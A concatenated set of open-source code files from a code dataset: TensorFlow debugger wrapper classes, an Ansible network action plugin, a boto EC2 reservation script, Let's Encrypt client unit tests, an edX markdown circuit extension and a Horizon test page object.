Args:
request: (`OnRunEndRequest`) callback request object carrying information
such as the actual action performed by the session wrapper for the
run() call.
Returns:
An instance of `OnRunStartResponse`.
"""
def __enter__(self):
return self._sess.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
self._sess.__exit__(exec_type, exec_value, exec_tb)
def close(self):
self._sess.close()
# TODO(cais): Add _node_name_regex_whitelist and
# _node_op_type_regex_whitelist.
@abc.abstractmethod
def invoke_node_stepper(self,
node_stepper,
restore_variable_values_on_exit=True):
"""Callback invoked when the client intends to step through graph nodes.
Args:
node_stepper: (stepper.NodeStepper) An instance of NodeStepper to be used
in this stepping session.
restore_variable_values_on_exit: (bool) Whether any variables whose values
have been altered during this node-stepper invocation should be restored
to their old values when this invocation ends.
Returns:
The same return values as the `Session.run()` call on the same fetches as
the NodeStepper.
"""
class WatchOptions(object):
"""Type for return values of watch_fn."""
def __init__(self,
debug_ops=None,
node_name_regex_whitelist=None,
op_type_regex_whitelist=None,
tensor_dtype_regex_whitelist=None,
tolerate_debug_op_creation_failures=False):
"""Constructor of WatchOptions: Debug watch options.
Used as return values of `watch_fn`s.
Args:
debug_ops: (`str` or `list of str`) Debug ops to be used.
node_name_regex_whitelist: Regular-expression whitelist for node_name,
e.g., `"(weight_[0-9]+|bias_.*)"`
op_type_regex_whitelist: Regular-expression whitelist for the op type of
nodes, e.g., `"(Variable|Add)"`.
If both `node_name_regex_whitelist` and `op_type_regex_whitelist`
are set, the two filtering operations will occur in a logical `AND`
relation. In other words, a node will be included if and only if it
hits both whitelists.
tensor_dtype_regex_whitelist: Regular-experssion whitelist for Tensor
data type, e.g., `"^int.*"`.
This whitelist operates in logical `AND` relations to the two whitelists
above.
tolerate_debug_op_creation_failures: (`bool`) whether debug op creation
failures (e.g., due to dtype incompatibility) are to be tolerated by not
throwing exceptions.
"""
if debug_ops:
self.debug_ops = debug_ops
else:
self.debug_ops = ["DebugIdentity"]
self.node_name_regex_whitelist = node_name_regex_whitelist
self.op_type_regex_whitelist = op_type_regex_whitelist
self.tensor_dtype_regex_whitelist = tensor_dtype_regex_whitelist
self.tolerate_debug_op_creation_failures = (
tolerate_debug_op_creation_failures)
def __repr__(self):
return ("WatchOptions(debug_ops=%r, node_name_regex_whitelist=%r, "
"op_type_regex_whitelist=%r, tensor_dtype_regex_whitelist=%r, "
"tolerate_debug_op_creation_failures=%r)" % (
self.debug_ops, self.node_name_regex_whitelist,
self.op_type_regex_whitelist, self.tensor_dtype_regex_whitelist,
self.tolerate_debug_op_creation_failures))
class NonInteractiveDebugWrapperSession(BaseDebugWrapperSession):
"""Base class for non-interactive (i.e., non-CLI) debug wrapper sessions."""
def __init__(self, sess, watch_fn=None, thread_name_filter=None):
"""Constructor of DumpingDebugWrapperSession.
Args:
sess: The TensorFlow `Session` object being wrapped.
watch_fn: (`Callable`) A Callable that maps the fetches and feeds of a
debugged `Session.run()` call to `WatchOptions.`
* Args:
* `fetches`: the fetches to the `Session.run()` call.
* `feeds`: the feeds to the `Session.run()` call.
* Returns:
(`tf_debug.WatchOptions`) An object containing debug options including
the debug ops to use, the node names, op types and/or tensor data
types to watch, etc. See the documentation of `tf_debug.WatchOptions`
for more details.
thread_name_filter: Regular-expression white list for threads on which the
wrapper session will be active. See doc of `BaseDebugWrapperSession` for
more details.
Raises:
TypeError: If a non-None `watch_fn` is specified and it is not callable.
"""
BaseDebugWrapperSession.__init__(
self, sess, thread_name_filter=thread_name_filter)
self._watch_fn = None
if watch_fn is not None:
if not callable(watch_fn):
raise TypeError("watch_fn is not callable")
self._watch_fn = watch_fn
def on_session_init(self, request):
"""See doc of BaseDebugWrapperSession.on_run_start."""
return OnSessionInitResponse(OnSessionInitAction.PROCEED)
@abc.abstractmethod
def prepare_run_debug_urls(self, fetches, feed_dict):
"""Abstract method to be implemented by concrete subclasses.
This method prepares the run-specific debug URL(s).
Args:
fetches: Same as the `fetches` argument to `Session.run()`
feed_dict: Same as the `feed_dict` argument to `Session.run()`
Returns:
debug_urls: (`str` or `list` of `str`) Debug URLs to be used in
this `Session.run()` call.
"""
def on_run_start(self, request):
"""See doc of BaseDebugWrapperSession.on_run_start."""
debug_urls, watch_opts = self._prepare_run_watch_config(
request.fetches, request.feed_dict)
return OnRunStartResponse(
OnRunStartAction.DEBUG_RUN,
debug_urls,
debug_ops=watch_opts.debug_ops,
node_name_regex_whitelist=watch_opts.node_name_regex_whitelist,
op_type_regex_whitelist=watch_opts.op_type_regex_whitelist,
tensor_dtype_regex_whitelist=watch_opts.tensor_dtype_regex_whitelist,
tolerate_debug_op_creation_failures=(
watch_opts.tolerate_debug_op_creation_failures))
def _prepare_run_watch_config(self, fetches, feed_dict):
"""Get the debug_urls, and node/op whitelists for the current run() call.
Args:
fetches: Same as the `fetches` argument to `Session.run()`.
feed_dict: Same as the `feed_dict argument` to `Session.run()`.
Returns:
debug_urls: (str or list of str) Debug URLs for the current run() call.
Currently, the list consists of only one URL that is a file:// URL.
watch_options: (WatchOptions) The return value of a watch_fn, containing
options including debug_ops, and whitelists.
"""
debug_urls = self.prepare_run_debug_urls(fetches, feed_dict)
if self._watch_fn is None:
watch_options = WatchOptions()
else:
watch_options = self._watch_fn(fetches, feed_dict)
if isinstance(watch_options, tuple):
# For legacy return type (tuples).
watch_options = WatchOptions(*watch_options)
return debug_urls, watch_options
def on_run_end(self, request):
"""See doc of BaseDebugWrapperSession.on_run_end."""
return OnRunEndResponse()
def invoke_node_stepper(self,
node_stepper,
restore_variable_values_on_exit=True):
"""See doc of BaseDebugWrapperSession.invoke_node_stepper."""
raise NotImplementedError(
"NonInteractiveDebugWrapperSession does not support node-stepper mode.")
| mit |
tdtrask/ansible | lib/ansible/plugins/action/ironware.py | 10 | 3719 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import copy
import json
from ansible import constants as C
from ansible.module_utils._text import to_text
from ansible.module_utils.connection import Connection
from ansible.plugins.action.normal import ActionModule as _ActionModule
from ansible.module_utils.network.common.utils import load_provider
from ansible.module_utils.network.ironware.ironware import ironware_provider_spec
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._play_context.connection != 'local':
return dict(
failed=True,
msg='invalid connection specified, expected connection=local, '
'got %s' % self._play_context.connection
)
provider = load_provider(ironware_provider_spec, self._task.args)
pc = copy.deepcopy(self._play_context)
pc.connection = 'network_cli'
pc.network_os = 'ironware'
pc.remote_addr = provider['host'] or self._play_context.remote_addr
pc.port = int(provider['port'] or self._play_context.port or 22)
pc.remote_user = provider['username'] or self._play_context.connection_user
pc.password = provider['password'] or self._play_context.password
pc.private_key_file = provider['ssh_keyfile'] or self._play_context.private_key_file
pc.timeout = int(provider['timeout'] or C.PERSISTENT_COMMAND_TIMEOUT)
pc.become = provider['authorize'] or False
if pc.become:
pc.become_method = 'enable'
pc.become_pass = provider['auth_pass']
display.vvv('using connection plugin %s (was local)' % pc.connection, pc.remote_addr)
connection = self._shared_loader_obj.connection_loader.get('persistent', pc, sys.stdin)
socket_path = connection.run()
display.vvvv('socket_path: %s' % socket_path, pc.remote_addr)
if not socket_path:
return {'failed': True,
'msg': 'unable to open shell. Please see: ' +
'https://docs.ansible.com/ansible/network_debug_troubleshooting.html#unable-to-open-shell'}
# make sure we are in the right cli context which should be
# enable mode and not config module
conn = Connection(socket_path)
out = conn.get_prompt()
if to_text(out, errors='surrogate_then_replace').strip().endswith(')#'):
display.vvvv('wrong context, sending end to device', self._play_context.remote_addr)
conn.send_command('end')
task_vars['ansible_socket'] = socket_path
if self._play_context.become_method == 'enable':
self._play_context.become = False
self._play_context.become_method = None
result = super(ActionModule, self).run(tmp, task_vars)
return result
| gpl-3.0 |
anthrotype/ctypes-binding-generator | cbind/passes/forward_decl.py | 2 | 1277 | # Copyright (C) 2013 Che-Liang Chiou.
'''Scan syntax tree for forward declarations.'''
from cbind.cindex import CursorKind
from cbind.passes.util import traverse_postorder, strip_type
import cbind.annotations as annotations
def scan_forward_decl(syntax_tree):
'''Scan syntax tree for forward declarations.'''
has_seen = set()
traverse_postorder(syntax_tree, lambda tree: _scan_tree(tree, has_seen))
def _scan_tree(tree, has_seen):
'''Scan tree for forward declarations.'''
if tree.is_user_defined_type_decl():
has_seen.add(tree)
if tree.kind == CursorKind.FUNCTION_DECL:
for type_ in tree.type.get_argument_types():
_scan_type_forward_decl(type_, has_seen)
_scan_type_forward_decl(tree.result_type, has_seen)
else:
_scan_type_forward_decl(tree.type, has_seen)
def _scan_type_forward_decl(type_, has_seen):
'''Scan type for forward declarations.'''
if type_.is_user_defined_type():
tree = type_.get_declaration()
if tree.is_user_defined_type_decl() and tree not in has_seen:
tree.annotate(annotations.FORWARD_DECLARATION, True)
return
stripped_type = strip_type(type_)
if stripped_type:
_scan_type_forward_decl(stripped_type, has_seen)
| gpl-3.0 |
benschmaus/catapult | third_party/gsutil/third_party/boto/boto/ec2/buyreservation.py | 152 | 3838 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto.ec2
from boto.sdb.db.property import StringProperty, IntegerProperty
from boto.manage import propget
from boto.compat import six
InstanceTypes = ['m1.small', 'm1.large', 'm1.xlarge',
'c1.medium', 'c1.xlarge', 'm2.xlarge',
'm2.2xlarge', 'm2.4xlarge', 'cc1.4xlarge',
't1.micro']
class BuyReservation(object):
def get_region(self, params):
if not params.get('region', None):
prop = StringProperty(name='region', verbose_name='EC2 Region',
choices=boto.ec2.regions)
params['region'] = propget.get(prop, choices=boto.ec2.regions)
def get_instance_type(self, params):
if not params.get('instance_type', None):
prop = StringProperty(name='instance_type', verbose_name='Instance Type',
choices=InstanceTypes)
params['instance_type'] = propget.get(prop)
def get_quantity(self, params):
if not params.get('quantity', None):
prop = IntegerProperty(name='quantity', verbose_name='Number of Instances')
params['quantity'] = propget.get(prop)
def get_zone(self, params):
if not params.get('zone', None):
prop = StringProperty(name='zone', verbose_name='EC2 Availability Zone',
choices=self.ec2.get_all_zones)
params['zone'] = propget.get(prop)
def get(self, params):
self.get_region(params)
self.ec2 = params['region'].connect()
self.get_instance_type(params)
self.get_zone(params)
self.get_quantity(params)
if __name__ == "__main__":
obj = BuyReservation()
params = {}
obj.get(params)
offerings = obj.ec2.get_all_reserved_instances_offerings(instance_type=params['instance_type'],
availability_zone=params['zone'].name)
print('\nThe following Reserved Instances Offerings are available:\n')
for offering in offerings:
offering.describe()
prop = StringProperty(name='offering', verbose_name='Offering',
choices=offerings)
offering = propget.get(prop)
print('\nYou have chosen this offering:')
offering.describe()
unit_price = float(offering.fixed_price)
total_price = unit_price * params['quantity']
print('!!! You are about to purchase %d of these offerings for a total of $%.2f !!!' % (params['quantity'], total_price))
answer = six.moves.input('Are you sure you want to do this? If so, enter YES: ')
if answer.strip().lower() == 'yes':
offering.purchase(params['quantity'])
else:
print('Purchase cancelled')
| bsd-3-clause |
lmcro/letsencrypt | letsencrypt/tests/client_test.py | 2 | 20361 | """Tests for letsencrypt.client."""
import os
import shutil
import tempfile
import unittest
import OpenSSL
import mock
from acme import jose
from letsencrypt import account
from letsencrypt import errors
from letsencrypt import le_util
from letsencrypt.tests import test_util
KEY = test_util.load_vector("rsa512_key.pem")
CSR_SAN = test_util.load_vector("csr-san.der")
class ConfigHelper(object):
"""Creates a dummy object to imitate a namespace object
Example: cfg = ConfigHelper(redirect=True, hsts=False, uir=False)
will result in: cfg.redirect=True, cfg.hsts=False, etc.
"""
def __init__(self, **kwds):
self.__dict__.update(kwds)
class RegisterTest(unittest.TestCase):
"""Tests for letsencrypt.client.register."""
def setUp(self):
self.config = mock.MagicMock(rsa_key_size=1024, register_unsafely_without_email=False)
self.account_storage = account.AccountMemoryStorage()
self.tos_cb = mock.MagicMock()
def _call(self):
from letsencrypt.client import register
return register(self.config, self.account_storage, self.tos_cb)
def test_no_tos(self):
with mock.patch("letsencrypt.client.acme_client.Client") as mock_client:
mock_client.register().terms_of_service = "http://tos"
with mock.patch("letsencrypt.account.report_new_account"):
self.tos_cb.return_value = False
self.assertRaises(errors.Error, self._call)
self.tos_cb.return_value = True
self._call()
self.tos_cb = None
self._call()
def test_it(self):
with mock.patch("letsencrypt.client.acme_client.Client"):
with mock.patch("letsencrypt.account.report_new_account"):
self._call()
@mock.patch("letsencrypt.account.report_new_account")
@mock.patch("letsencrypt.client.display_ops.get_email")
def test_email_retry(self, _rep, mock_get_email):
from acme import messages
msg = "DNS problem: NXDOMAIN looking up MX for example.com"
mx_err = messages.Error(detail=msg, typ="urn:acme:error:invalidEmail")
with mock.patch("letsencrypt.client.acme_client.Client") as mock_client:
mock_client().register.side_effect = [mx_err, mock.MagicMock()]
self._call()
self.assertEqual(mock_get_email.call_count, 1)
def test_needs_email(self):
self.config.email = None
self.assertRaises(errors.Error, self._call)
@mock.patch("letsencrypt.client.logger")
def test_without_email(self, mock_logger):
with mock.patch("letsencrypt.client.acme_client.Client"):
with mock.patch("letsencrypt.account.report_new_account"):
self.config.email = None
self.config.register_unsafely_without_email = True
self.config.dry_run = False
self._call()
mock_logger.warn.assert_called_once_with(mock.ANY)
def test_unsupported_error(self):
from acme import messages
msg = "Test"
mx_err = messages.Error(detail=msg, typ="malformed", title="title")
with mock.patch("letsencrypt.client.acme_client.Client") as mock_client:
mock_client().register.side_effect = [mx_err, mock.MagicMock()]
self.assertRaises(messages.Error, self._call)
class ClientTest(unittest.TestCase):
"""Tests for letsencrypt.client.Client."""
def setUp(self):
self.config = mock.MagicMock(
no_verify_ssl=False, config_dir="/etc/letsencrypt", allow_subset_of_names=False)
# pylint: disable=star-args
self.account = mock.MagicMock(**{"key.pem": KEY})
self.eg_domains = ["example.com", "www.example.com"]
from letsencrypt.client import Client
with mock.patch("letsencrypt.client.acme_client.Client") as acme:
self.acme_client = acme
self.acme = acme.return_value = mock.MagicMock()
self.client = Client(
config=self.config, account_=self.account,
auth=None, installer=None)
def test_init_acme_verify_ssl(self):
net = self.acme_client.call_args[1]["net"]
self.assertTrue(net.verify_ssl)
def _mock_obtain_certificate(self):
self.client.auth_handler = mock.MagicMock()
self.client.auth_handler.get_authorizations.return_value = [None]
self.acme.request_issuance.return_value = mock.sentinel.certr
self.acme.fetch_chain.return_value = mock.sentinel.chain
def _check_obtain_certificate(self):
self.client.auth_handler.get_authorizations.assert_called_once_with(
self.eg_domains,
self.config.allow_subset_of_names)
authzr = self.client.auth_handler.get_authorizations()
self.acme.request_issuance.assert_called_once_with(
jose.ComparableX509(OpenSSL.crypto.load_certificate_request(
OpenSSL.crypto.FILETYPE_ASN1, CSR_SAN)),
authzr)
self.acme.fetch_chain.assert_called_once_with(mock.sentinel.certr)
# FIXME move parts of this to test_cli.py...
@mock.patch("letsencrypt.client.logger")
def test_obtain_certificate_from_csr(self, mock_logger):
self._mock_obtain_certificate()
from letsencrypt import cli
test_csr = le_util.CSR(form="der", file=None, data=CSR_SAN)
mock_parsed_args = mock.MagicMock()
# The CLI should believe that this is a certonly request, because
# a CSR would not be allowed with other kinds of requests!
mock_parsed_args.verb = "certonly"
with mock.patch("letsencrypt.client.le_util.CSR") as mock_CSR:
mock_CSR.return_value = test_csr
mock_parsed_args.domains = self.eg_domains[:]
mock_parser = mock.MagicMock(cli.HelpfulArgumentParser)
cli.HelpfulArgumentParser.handle_csr(mock_parser, mock_parsed_args)
# Now provoke an inconsistent domains error...
mock_parsed_args.domains.append("hippopotamus.io")
self.assertRaises(errors.ConfigurationError,
cli.HelpfulArgumentParser.handle_csr, mock_parser, mock_parsed_args)
authzr = self.client.auth_handler.get_authorizations(self.eg_domains, False)
self.assertEqual(
(mock.sentinel.certr, mock.sentinel.chain),
self.client.obtain_certificate_from_csr(
self.eg_domains,
test_csr,
authzr=authzr))
# and that the cert was obtained correctly
self._check_obtain_certificate()
# Test for authzr=None
self.assertEqual(
(mock.sentinel.certr, mock.sentinel.chain),
self.client.obtain_certificate_from_csr(
self.eg_domains,
test_csr,
authzr=None))
self.client.auth_handler.get_authorizations.assert_called_with(
self.eg_domains)
# Test for no auth_handler
self.client.auth_handler = None
self.assertRaises(
errors.Error,
self.client.obtain_certificate_from_csr,
self.eg_domains,
test_csr)
mock_logger.warning.assert_called_once_with(mock.ANY)
@mock.patch("letsencrypt.client.crypto_util")
def test_obtain_certificate(self, mock_crypto_util):
self._mock_obtain_certificate()
csr = le_util.CSR(form="der", file=None, data=CSR_SAN)
mock_crypto_util.init_save_csr.return_value = csr
mock_crypto_util.init_save_key.return_value = mock.sentinel.key
domains = ["example.com", "www.example.com"]
# return_value is essentially set to (None, None) in
# _mock_obtain_certificate(), which breaks this test.
# Thus fixed by the next line.
authzr = []
for domain in domains:
authzr.append(
mock.MagicMock(
body=mock.MagicMock(
identifier=mock.MagicMock(
value=domain))))
self.client.auth_handler.get_authorizations.return_value = authzr
self.assertEqual(
self.client.obtain_certificate(domains),
(mock.sentinel.certr, mock.sentinel.chain, mock.sentinel.key, csr))
mock_crypto_util.init_save_key.assert_called_once_with(
self.config.rsa_key_size, self.config.key_dir)
mock_crypto_util.init_save_csr.assert_called_once_with(
mock.sentinel.key, domains, self.config.csr_dir)
self._check_obtain_certificate()
def test_save_certificate(self):
certs = ["matching_cert.pem", "cert.pem", "cert-san.pem"]
tmp_path = tempfile.mkdtemp()
os.chmod(tmp_path, 0o755) # TODO: really??
certr = mock.MagicMock(body=test_util.load_comparable_cert(certs[0]))
chain_cert = [test_util.load_comparable_cert(certs[1]),
test_util.load_comparable_cert(certs[2])]
candidate_cert_path = os.path.join(tmp_path, "certs", "cert.pem")
candidate_chain_path = os.path.join(tmp_path, "chains", "chain.pem")
candidate_fullchain_path = os.path.join(tmp_path, "chains", "fullchain.pem")
cert_path, chain_path, fullchain_path = self.client.save_certificate(
certr, chain_cert, candidate_cert_path, candidate_chain_path,
candidate_fullchain_path)
self.assertEqual(os.path.dirname(cert_path),
os.path.dirname(candidate_cert_path))
self.assertEqual(os.path.dirname(chain_path),
os.path.dirname(candidate_chain_path))
self.assertEqual(os.path.dirname(fullchain_path),
os.path.dirname(candidate_fullchain_path))
with open(cert_path, "r") as cert_file:
cert_contents = cert_file.read()
self.assertEqual(cert_contents, test_util.load_vector(certs[0]))
with open(chain_path, "r") as chain_file:
chain_contents = chain_file.read()
self.assertEqual(chain_contents, test_util.load_vector(certs[1]) +
test_util.load_vector(certs[2]))
shutil.rmtree(tmp_path)
def test_deploy_certificate_success(self):
self.assertRaises(errors.Error, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
installer = mock.MagicMock()
self.client.installer = installer
self.client.deploy_certificate(
["foo.bar"], "key", "cert", "chain", "fullchain")
installer.deploy_cert.assert_called_once_with(
cert_path=os.path.abspath("cert"),
chain_path=os.path.abspath("chain"),
domain='foo.bar',
fullchain_path='fullchain',
key_path=os.path.abspath("key"))
self.assertEqual(installer.save.call_count, 2)
installer.restart.assert_called_once_with()
def test_deploy_certificate_failure(self):
installer = mock.MagicMock()
self.client.installer = installer
installer.deploy_cert.side_effect = errors.PluginError
self.assertRaises(errors.PluginError, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
installer.recovery_routine.assert_called_once_with()
def test_deploy_certificate_save_failure(self):
installer = mock.MagicMock()
self.client.installer = installer
installer.save.side_effect = errors.PluginError
self.assertRaises(errors.PluginError, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
installer.recovery_routine.assert_called_once_with()
@mock.patch("letsencrypt.client.zope.component.getUtility")
def test_deploy_certificate_restart_failure(self, mock_get_utility):
installer = mock.MagicMock()
installer.restart.side_effect = [errors.PluginError, None]
self.client.installer = installer
self.assertRaises(errors.PluginError, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
self.assertEqual(mock_get_utility().add_message.call_count, 1)
installer.rollback_checkpoints.assert_called_once_with()
self.assertEqual(installer.restart.call_count, 2)
@mock.patch("letsencrypt.client.zope.component.getUtility")
def test_deploy_certificate_restart_failure2(self, mock_get_utility):
installer = mock.MagicMock()
installer.restart.side_effect = errors.PluginError
installer.rollback_checkpoints.side_effect = errors.ReverterError
self.client.installer = installer
self.assertRaises(errors.PluginError, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
self.assertEqual(mock_get_utility().add_message.call_count, 1)
installer.rollback_checkpoints.assert_called_once_with()
self.assertEqual(installer.restart.call_count, 1)
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config(self, mock_enhancements):
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.Error,
self.client.enhance_config, ["foo.bar"], config)
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_called_once_with("foo.bar", "redirect", None)
self.assertEqual(installer.save.call_count, 1)
installer.restart.assert_called_once_with()
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_no_ask(self, mock_enhancements):
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.Error,
self.client.enhance_config, ["foo.bar"], config)
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect", "ensure-http-header"]
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_called_with("foo.bar", "redirect", None)
config = ConfigHelper(redirect=False, hsts=True, uir=False)
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_called_with("foo.bar", "ensure-http-header",
"Strict-Transport-Security")
config = ConfigHelper(redirect=False, hsts=False, uir=True)
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_called_with("foo.bar", "ensure-http-header",
"Upgrade-Insecure-Requests")
self.assertEqual(installer.save.call_count, 3)
self.assertEqual(installer.restart.call_count, 3)
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_unsupported(self, mock_enhancements):
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = []
config = ConfigHelper(redirect=None, hsts=True, uir=True)
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_not_called()
mock_enhancements.ask.assert_not_called()
def test_enhance_config_no_installer(self):
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.Error,
self.client.enhance_config, ["foo.bar"], config)
@mock.patch("letsencrypt.client.zope.component.getUtility")
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_enhance_failure(self, mock_enhancements,
mock_get_utility):
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
installer.enhance.side_effect = errors.PluginError
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.PluginError,
self.client.enhance_config, ["foo.bar"], config)
installer.recovery_routine.assert_called_once_with()
self.assertEqual(mock_get_utility().add_message.call_count, 1)
@mock.patch("letsencrypt.client.zope.component.getUtility")
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_save_failure(self, mock_enhancements,
mock_get_utility):
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
installer.save.side_effect = errors.PluginError
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.PluginError,
self.client.enhance_config, ["foo.bar"], config)
installer.recovery_routine.assert_called_once_with()
self.assertEqual(mock_get_utility().add_message.call_count, 1)
@mock.patch("letsencrypt.client.zope.component.getUtility")
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_restart_failure(self, mock_enhancements,
mock_get_utility):
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
installer.restart.side_effect = [errors.PluginError, None]
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.PluginError,
self.client.enhance_config, ["foo.bar"], config)
self.assertEqual(mock_get_utility().add_message.call_count, 1)
installer.rollback_checkpoints.assert_called_once_with()
self.assertEqual(installer.restart.call_count, 2)
@mock.patch("letsencrypt.client.zope.component.getUtility")
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_restart_failure2(self, mock_enhancements,
mock_get_utility):
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
installer.restart.side_effect = errors.PluginError
installer.rollback_checkpoints.side_effect = errors.ReverterError
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.PluginError,
self.client.enhance_config, ["foo.bar"], config)
self.assertEqual(mock_get_utility().add_message.call_count, 1)
installer.rollback_checkpoints.assert_called_once_with()
self.assertEqual(installer.restart.call_count, 1)
class RollbackTest(unittest.TestCase):
"""Tests for letsencrypt.client.rollback."""
def setUp(self):
self.m_install = mock.MagicMock()
@classmethod
def _call(cls, checkpoints, side_effect):
from letsencrypt.client import rollback
with mock.patch("letsencrypt.client.plugin_selection.pick_installer") as mpi:
mpi.side_effect = side_effect
rollback(None, checkpoints, {}, mock.MagicMock())
def test_no_problems(self):
self._call(1, self.m_install)
self.assertEqual(self.m_install().rollback_checkpoints.call_count, 1)
self.assertEqual(self.m_install().restart.call_count, 1)
def test_no_installer(self):
self._call(1, None) # Just make sure no exceptions are raised
if __name__ == "__main__":
unittest.main() # pragma: no cover
| apache-2.0 |
chrisfilda/edx_platform | lms/djangoapps/course_wiki/plugins/markdownedx/mdx_circuit.py | 158 | 2645 | #!/usr/bin/env python
'''
Image Circuit Extension for Python-Markdown
======================================
Any single line beginning with circuit-schematic: and followed by data (which should be json data, but this
is not enforced at this level) will be displayed as a circuit schematic. This is simply an input element with
the value set to the data. It is left to javascript on the page to render that input as a circuit schematic.
ex:
circuit-schematic:[["r",[128,48,0],{"r":"1","_json_":0},["2","1"]],["view",0,0,2,null,null,null,null,null,null,null],["dc",{"0":0,"1":1,"I(_3)":-1}]]
(This is a schematic with a single one-ohm resistor. Note that this data is not meant to be user-editable.)
'''
import markdown
import re
from django.utils.html import escape
try:
# Markdown 2.1.0 changed from 2.0.3. We try importing the new version first,
# but import the 2.0.3 version if it fails
from markdown.util import etree
except:
from markdown import etree
class CircuitExtension(markdown.Extension):
def __init__(self, configs):
for key, value in configs:
self.setConfig(key, value)
def extendMarkdown(self, md, md_globals):
## Because Markdown treats contigous lines as one block of text, it is hard to match
## a regex that must occupy the whole line (like the circuit regex). This is why we have
## a preprocessor that inspects the lines and replaces the matched lines with text that is
## easier to match
md.preprocessors.add('circuit', CircuitPreprocessor(md), "_begin")
pattern = CircuitLink(r'processed-schematic:(?P<data>.*?)processed-schematic-end')
pattern.md = md
pattern.ext = self
md.inlinePatterns.add('circuit', pattern, "<reference")
class CircuitPreprocessor(markdown.preprocessors.Preprocessor):
preRegex = re.compile(r'^circuit-schematic:(?P<data>.*)$')
def run(self, lines):
def convertLine(line):
m = self.preRegex.match(line)
if m:
return 'processed-schematic:{0}processed-schematic-end'.format(m.group('data'))
else:
return line
return [convertLine(line) for line in lines]
class CircuitLink(markdown.inlinepatterns.Pattern):
def handleMatch(self, m):
data = m.group('data')
data = escape(data)
return etree.fromstring("<div align='center'><input type='hidden' parts='' value='" + data + "' analyses='' class='schematic ctrls' width='400' height='220'/></div>")
def makeExtension(configs=None):
to_return = CircuitExtension(configs=configs)
return to_return
| agpl-3.0 |
aaronorosen/horizon-congress | openstack_dashboard/test/integration_tests/pages/changepasswordpage.py | 13 | 2981 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.pages import pageobject
class ChangePasswordPage(basepage.BasePage):
@property
def modal(self):
return ChangePasswordPage.ChangePasswordModal(self.driver,
self.conf)
